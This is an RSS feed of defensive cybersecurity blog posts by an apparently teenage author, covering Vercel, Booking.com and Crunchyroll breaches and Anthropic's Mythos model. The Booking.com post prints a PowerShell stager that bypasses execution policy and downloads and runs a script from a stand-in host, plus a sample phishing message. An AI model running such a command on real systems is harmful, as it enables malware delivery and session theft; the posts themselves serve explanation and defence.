<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Bulut Caner</title>
    <description>The latest articles on DEV Community by Bulut Caner (@cnrco).</description>
    <link>https://dev.to/cnrco</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3882479%2F59116331-d1ee-4673-a8fa-40e7a08389a2.png</url>
      <title>DEV Community: Bulut Caner</title>
      <link>https://dev.to/cnrco</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/cnrco"/>
    <language>en</language>
    <item>
      <title>The $2 Million Permission You Forgot You Granted</title>
      <dc:creator>Bulut Caner</dc:creator>
      <pubDate>Mon, 18 May 2026 08:49:27 +0000</pubDate>
      <link>https://dev.to/cnrco/the-2-million-permission-you-forgot-you-granted-1ahn</link>
      <guid>https://dev.to/cnrco/the-2-million-permission-you-forgot-you-granted-1ahn</guid>
      <description>&lt;p&gt;At some point you clicked “login with Google” or another account on a third-party app because it was faster and the easiest way to get what you wanted from the site. You clicked and forgot about it. Well, so did a Vercel employee. That single click is exactly how threat actors walked straight into one of the most widely recognized cloud platforms on the internet in April 2026. The attackers accessed internal environment variables (dynamically set values used throughout a program that determine how it behaves on each device) and came back demanding $2 million. This was possible solely because of a forgotten permission and a chain of connections that was nowhere in the foreground. Here’s the plot.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;More about Vercel&lt;/strong&gt;&lt;br&gt;
Vercel is an American cloud application company that specializes in providing developer tools and infrastructure for building, deploying, and maintaining websites. It is particularly known for creating and optimizing the Next.js framework, which is widely used for React applications. Vercel is optimized for Next.js but also supports other frameworks such as Django and Flask. This breach specifically did not compromise Vercel’s customer-side encryption, but it exposed internal environment variables, which should never have been reachable from the outside. The breach mainly has to do with OAuth permissions, so a word on OAuth: it is the protocol behind every “login with Slack” or “connect with GitHub” button we normally click. When we authorize a third-party app, we issue it a token (a temporary access key) that lets it act on our behalf with whatever permissions we allowed. The problem is that most people simply click “allow all”, which hands the app a master key to the account. Once the connection is authorized, it just sits there, trusted by every system it comes into contact with. These integrations are given broad permissions because companies tend to value functionality over security. After connecting them, they forget about them and never audit what data these apps can access.&lt;br&gt;
The Vercel breach is not the first time this exact mechanism caused a big problem. In August 2025 a threat actor tracked as UNC6395 used stolen OAuth tokens from Drift’s Salesforce integration to access customer environments across more than 700 organizations. No exploit or phishing was involved. The same method was used, only against different companies.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How Did The Breach Start In The Beginning?&lt;/strong&gt;&lt;br&gt;
The Vercel breach did not actually start at Vercel. It started a lot earlier, at a small AI startup most people have never heard of, and then moved from that company to other places through a chain of people and companies that everyone trusted. Back in February 2026, an employee of Context.ai (an enterprise AI productivity tool, part of the growing category of “AI Office Suite” products that plug into your Google Workspace) was infected with Lumma Stealer. Lumma Stealer is an information-stealing malware that specializes in harvesting sensitive data such as browser data or cryptocurrency wallet details. The infected employee was a core member of the startup team with direct access to important administrative endpoints, including the environment variable settings and production logs, which made the theft of critical information that much easier.&lt;/p&gt;

&lt;p&gt;Hudson Rock’s intelligence analysis found that the employee had been downloading Roblox “auto-farm” scripts and executors. Such downloads are an efficient delivery vector for malware like Lumma Stealer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Not Your Usual Password Stealer&lt;/strong&gt;&lt;br&gt;
Lumma is a session vacuum: it does not need your password, because it steals your active browser cookies, the tokens that tell websites “this person is already logged in, trust them”. That bypasses MFA entirely. The threat actors are thus not logging in as you but resuming your ongoing session on a website. This is not advanced malware used by governments. Infostealers such as Lumma can be bought and used by anyone for around fifty dollars per month, which is cheaper than many software subscriptions. In the first half of 2025 these infostealers stole over two hundred seventy thousand Slack login details. (Engaging in the purchase, distribution, or use of malware is illegal and carries severe criminal penalties. This information is provided for educational purposes to help security professionals and organizations defend against these evolving threats.)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Threat Actors:&lt;/strong&gt;&lt;br&gt;
A threat actor using the ShinyHunters persona claimed responsibility for the attack via Telegram and BreachForums. They claimed to have stolen access keys, source code and other valuable information and demanded $2 million in return. Vercel confirmed the breach publicly and said that it affected a limited set of customer information. They notified law enforcement and checked with GitHub, Microsoft, npm and Socket to make sure none of the packages on npm were compromised.&lt;/p&gt;

&lt;p&gt;Important: Vercel also published a specific OAuth Client ID as an indicator of compromise:&lt;br&gt;
110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com&lt;/p&gt;

&lt;p&gt;Google Workspace admins should check their API Controls console for this immediately.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Two Things to Do For Businesses Before You Close This Tab:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Go to myaccount.google.com/permissions. Every app listed there has some level of access to your Google account. Check these thoroughly and disable permissions that are not in use. Also, review the activity log for any suspicious or unrecognized activity. Attackers no longer need to deploy detectable payloads. They use OAuth tokens, API keys and service accounts to access secure systems, which makes their actions look like regular business operations. Traditional perimeter defenses and endpoint detection systems fail to detect adversaries who operate with real credentials through legitimate system connections.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Only Best Conclusion&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Vercel breach will be described in three ways: as a supply chain attack, as an OAuth failure and as an infostealer incident. All of those framings are correct. But the simplest framing is this: someone granted a permission, forgot about it, and that forgotten permission became a $2 million problem.&lt;br&gt;
Check your permissions now instead of waiting until next week.&lt;/p&gt;

</description>
      <category>hack</category>
      <category>cybersecurity</category>
      <category>security</category>
    </item>
    <item>
      <title>The Zero-Day Factory: Anthropic’s ‘Mythos’ and the End of Code Security</title>
      <dc:creator>Bulut Caner</dc:creator>
      <pubDate>Mon, 18 May 2026 08:46:08 +0000</pubDate>
      <link>https://dev.to/cnrco/the-zero-day-factory-anthropics-mythos-and-the-end-of-code-security-20nj</link>
      <guid>https://dev.to/cnrco/the-zero-day-factory-anthropics-mythos-and-the-end-of-code-security-20nj</guid>
      <description>&lt;p&gt;On April 7th, 2026, there was a remarkable shift within the digital world. Anthropic released a warning flag disguised as a language model. The tech world expected a better assistant; instead, we received Claude Mythos Preview. Anthropic’s own technical blog states that Mythos was able to discover vulnerabilities but does not autonomously weaponize them. To play it safe, Anthropic has kept it behind a defensive alliance known as “Project Glasswing”.&lt;/p&gt;

&lt;p&gt;While previous large language models rely on pattern recognition to generate answers and make fixes, Mythos analyzes the deep logic of unsafe, vulnerable code and then identifies failures within its structure. Analysts estimate that these zero-day chains currently cost around $2000 in computing.&lt;/p&gt;

&lt;p&gt;The most chilling angle of the Mythos announcement is its ability to comb through ancient repositories and find vulnerabilities that have haunted us for a long time. For example, Mythos identified a 27-year-old critical flaw in OpenBSD and a 16-year-old vulnerability in FFmpeg within hours of initialization. These bugs survived decades of expert audits and automated fuzzing, proving that our infrastructure has been ‘un-scanned’ rather than ‘secure’.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Representation only — simplified CVSS v3.1 base score calculation
# This mirrors the severity class of vulnerabilities Mythos identified:
# network-accessible, no privileges required, high impact across C, I, A
&lt;/span&gt;
&lt;span class="n"&gt;impact&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mf"&gt;0.56&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mf"&gt;0.56&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mf"&gt;0.56&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# High confidentiality, integrity, availability impact
&lt;/span&gt;&lt;span class="n"&gt;exploitability&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;8.22&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.85&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.77&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.85&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.85&lt;/span&gt;     &lt;span class="c1"&gt;# Network vector, low complexity, no privileges, no user interaction
&lt;/span&gt;&lt;span class="n"&gt;base_score&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;round&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;min&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;impact&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;6.42&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;exploitability&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;CVSS v3.1 Base Score: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;base_score&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Output: 9.8 — Critical
&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We have relied on the limits of human effort to keep our systems standing; Mythos has no such limits. Anthropic knew their creation was very powerful and could cause a lot of problems, so they put Mythos inside Project Glasswing, a group that includes the US Treasury, the UK AI Security Institute and big companies like Apple and Microsoft. Anthropic is providing massive compute credits to open-source maintainers to run the largest patching spree in human history. Only strictly vetted people are allowed to use Mythos. For now it is kept locked down and used only to help defense, the Blue Team, before someone else gets hold of something similar to Mythos. The arrival of Mythos shows us a sad truth: attacks can now be automated. This means we are living in a time where developers and builders have to stay one step ahead of threat actors who have the potential to compromise them. Developers have to be right all the time, even when they are looking at millions and millions of lines of code. Threat actors, on the other hand, only need to find one little mistake in some old code from the 1990s to cause big problems for a whole network.&lt;/p&gt;

&lt;p&gt;Contrary to the tone of this article so far, Mythos is better understood as a digital immune system rather than a mere weapon. I strongly believe it should shift our perspective from fear to fortification. We should not be scared of Mythos. It is actually an asset because it moves so fast: cybersecurity professionals can use Mythos to find and fix problems before the attackers even find them (at least for now). Relying solely on artificial intelligence for defense is not a good idea, because it creates a single point that lacks human instinct and ethical supervision. These autonomous systems are very fast. However, they can be fooled by inputs designed to confuse the AI system. We still need humans to make sure artificial intelligence systems are working correctly.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>programming</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Booking.com Got Breached. Your Reservation Was the Weapon.</title>
      <dc:creator>Bulut Caner</dc:creator>
      <pubDate>Mon, 20 Apr 2026 11:05:18 +0000</pubDate>
      <link>https://dev.to/cnrco/bookingcom-got-breached-your-reservation-was-the-weapon-45hf</link>
      <guid>https://dev.to/cnrco/bookingcom-got-breached-your-reservation-was-the-weapon-45hf</guid>
      <description>&lt;p&gt;On April 13th, 2026, the online travel agency Booking.com issued a major breach notification that echoed back to 2021. There was unauthorized access to customer PII (Personally Identifiable Information). After the breach, their Public Relations team immediately stated that financial information was not accessed by the threat actors.&lt;/p&gt;

&lt;p&gt;The breach most likely did not hit Booking.com’s core servers but its supply chain. The supply chain in this case refers to the network of partner hotels connected to Booking.com. If the hackers can’t, or choose not to, hack the “big bank”, they go to its local branches. The threat actors likely used a tactic called ClickFix, where they tricked hotel staff into running a malicious script under the guise of “fixing” a browser error; that script then steals their session cookies. Session cookies are the digital ID within your browser that keeps you logged in. When a hacker steals this, they bypass the need for a password and Multi-Factor Authentication completely. To understand how malware gets into a system we need to look at a stager. A stager is a small piece of code whose job is to download a malicious payload. The stager is the delivery tool for the harmful code; the malware is the harmful code that the stager downloads.&lt;/p&gt;

&lt;p&gt;Disclaimer: The following code is purely for representation and provided with the intention of educational display.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="c"&gt;# CONCEPTUAL REPRESENTATION ONLY — educational purposes&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="c"&gt;# Modern EDR/AMSI solutions would flag and block this immediately.&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;powershell.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ExecutionPolicy&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Bypass&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-WindowStyle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Hidden&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"iex(New-Object Net.WebClient).DownloadString('https://example.com/malicious-script.ps1')"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;-ExecutionPolicy Bypass: Tells the system to ignore local script restrictions.&lt;br&gt;
iex (Invoke-Expression): A common "red flag" command that runs downloaded code directly in the computer's memory.&lt;br&gt;
Although only non-financial data was breached, it is still dangerous and a major threat. Attackers can take the stolen PII and use it to make up a lie that seems impossible to ignore. Because the threat actor knows your check-in date, hotel name and more details about the reservation, you believe the message is real.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"guest_name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Jane Smith"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"booking_ref"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"BK-99210"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"check_in"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"2026-05-14"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"hotel_name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Seaside Resort"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The message can look something like this: &lt;em&gt;“Hi Jane, your booking BK-99210 for May 14th is at risk. Please verify your payment over here so we can save your booking details.”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Booking.com had a similar breach back in 2021 and was fined €475,000 under the General Data Protection Regulation, a European law that can hit companies with massive fines if they lose customer or user data.&lt;/p&gt;

&lt;p&gt;You do not have to be a tech giant such as Booking.com to be picked as a target. Small businesses have often been used as a bridge to bigger targets or to their customers’ wallets. As you can see, this breach was not high tech but a simple one. The people were exploited along with the companies’ data systems. Tackling session hijacking and supply chain vulnerabilities like these can involve many measures. First of all, you can ensure that your web applications support Device Bound Session Credentials (DBSC). DBSC cryptographically binds a session to the device’s Trusted Platform Module. When an attacker tries to exfiltrate the cookie to another machine, the session becomes invalid, because the private key never leaves the original hardware. Another good measure is enabling PowerShell Constrained Language Mode and blocking the -ExecutionPolicy Bypass flag for non-admin users.&lt;/p&gt;

&lt;p&gt;A good takeaway from this breach: if you wait for the attack to develop before you secure your systems and partners, you have already lost the battle. Defense must begin while everything is still quiet.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>When Third Party Support Becomes Your Weakest Point: April 2026 Security Breach</title>
      <dc:creator>Bulut Caner</dc:creator>
      <pubDate>Thu, 16 Apr 2026 12:56:14 +0000</pubDate>
      <link>https://dev.to/cnrco/when-third-party-support-becomes-your-weakest-point-april-2026-security-breach-1f5c</link>
      <guid>https://dev.to/cnrco/when-third-party-support-becomes-your-weakest-point-april-2026-security-breach-1f5c</guid>
      <description>&lt;p&gt;On March 12, 2026, threat actors got into Crunchyroll’s support system by putting malware on a Telus International support agent’s computer and stealing their login details. With one login they could get into many internal systems like Zendesk, Gmail, Slack and Jira.&lt;br&gt;
The attackers’ main goal was Crunchyroll’s support system, Zendesk. This software helps manage customer requests in one place. Within 24 hours they downloaded 8 million support tickets. These tickets contained information such as customer names, emails, IP addresses and locations.&lt;/p&gt;

&lt;p&gt;The attackers demanded $5 million. When Crunchyroll didn’t pay, they leaked the data on April 4. Companies that do work for others, like BPOs, are major targets: if one employee’s computer gets compromised, the bad actors can get into several companies at once. Crunchyroll’s systems lacked basic defenses: there was no API rate limiting, no anomaly detection and no real-time monitoring. What would have prevented this breach, or at least made it less severe, is blocking bulk downloads, flagging unusual access patterns, hardware multi-factor authentication and network segmentation. This is not new either. Discord, Marks &amp;amp; Spencer, Co-op, and others have been hit the same way. Until companies audit BPO permissions and implement zero-trust controls, expect more breaches.&lt;/p&gt;

&lt;p&gt;There was probably no reason for a support agent to have full access to Jira, Slack, Gmail and Zendesk at the same time. This suggests that the company failed to control who had access to what, giving agents more access than they needed for their job. Beyond password theft, the hackers likely used malware to steal session cookies. These cookies let attackers appear to be logged in, bypassing multi-factor authentication. The damage goes beyond the initial $5 million ransom demand. With eight million tickets leaked, the risk now is that attackers will use this information to send emails that trick users into giving away credit card details or login credentials. For the company that was breached the fallout is huge, showing a failure in endpoint security that allowed malware to persist undetected.&lt;/p&gt;

&lt;p&gt;To prevent these kinds of attacks, companies need to change how they think about security. They need to move from trusting vendors toward a Zero Trust model. This starts with granting access only to the specific application needed for a task. If an agent is working in Zendesk, they should not even be able to see the Jira login page. Companies should also require hardware-based multi-factor authentication, like physical security keys. These devices are much harder to defeat than SMS or app-based codes. Data loss prevention must also be reinforced with API rate limiting and behavioral monitoring. The fact that millions of tickets were downloaded within a single day points to a lack of checks in the system. Security controls should limit the number of records a single user can pull in a given timeframe.&lt;br&gt;
For sensitive roles, companies can eliminate the risk of local device compromise by using Virtual Desktop Infrastructure (VDI) or managed enterprise browsers. In a VDI environment the agent logs into a machine managed by the parent company, ensuring that no data lives on the agent’s hardware.&lt;br&gt;
Finally, security must be treated as a contractual obligation, not just a technical one. Organizations must implement third-party audits and “right-to-audit” clauses that allow for unannounced security scans of a vendor’s endpoint hygiene. Service Level Agreements should include financial penalties if a breach results from a vendor’s failure to maintain basic defenses. By treating BPO employees as high-risk users and wrapping their access in these layers of friction, companies can prioritize data safety.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>data</category>
      <category>hack</category>
      <category>security</category>
    </item>
    <item>
      <title>Why a High School Student is Covering Defensive Cybersecurity</title>
      <dc:creator>Bulut Caner</dc:creator>
      <pubDate>Thu, 16 Apr 2026 12:47:19 +0000</pubDate>
      <link>https://dev.to/cnrco/why-a-high-school-student-is-covering-defensive-cybersecurity-2225</link>
      <guid>https://dev.to/cnrco/why-a-high-school-student-is-covering-defensive-cybersecurity-2225</guid>
      <description>&lt;p&gt;I’m 16. I recently started discovering cybersecurity purely out of curiosity, to see what it’s like protecting yourself and others from cybercriminals before it becomes a bigger problem within society. The deeper I delved into this field, the more I saw that I needed to learn more, to fully comprehend how computers communicate before understanding how they’re exploited.&lt;/p&gt;

&lt;p&gt;About me: In two years I would like to study cybersecurity &amp;amp; cybercrime at a university. This newsletter will be me documenting multiple aspects of cybersecurity to document how breaches happen globally and what we can learn from them. Many angles will be discovered such as defensive security analysis, the attack prevention measures of organizations, what went wrong and how it could possibly have been prevented. I am currently the Head of Technics of our MUN organization, where I built and deployed a website from scratch. Within the process I learned web design, web development and DNS configuration of our custom domain.&lt;/p&gt;

&lt;p&gt;Defense Stack, The Security Analysis Newsletter by a high school student: The first posts will break down recent cybersecurity breaches, what happened, how attackers got in, as well as what defensive measures could help stop it. If you’re curious about cybersecurity, learning alongside me, or just want to understand what’s happening in the digital threat landscape, you may want to join me. This will be a long journey and I am going to extract as much information as I can.&lt;/p&gt;

&lt;p&gt;— First Publication of Defense Stack &amp;gt;_&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>data</category>
      <category>cli</category>
    </item>
  </channel>
</rss>
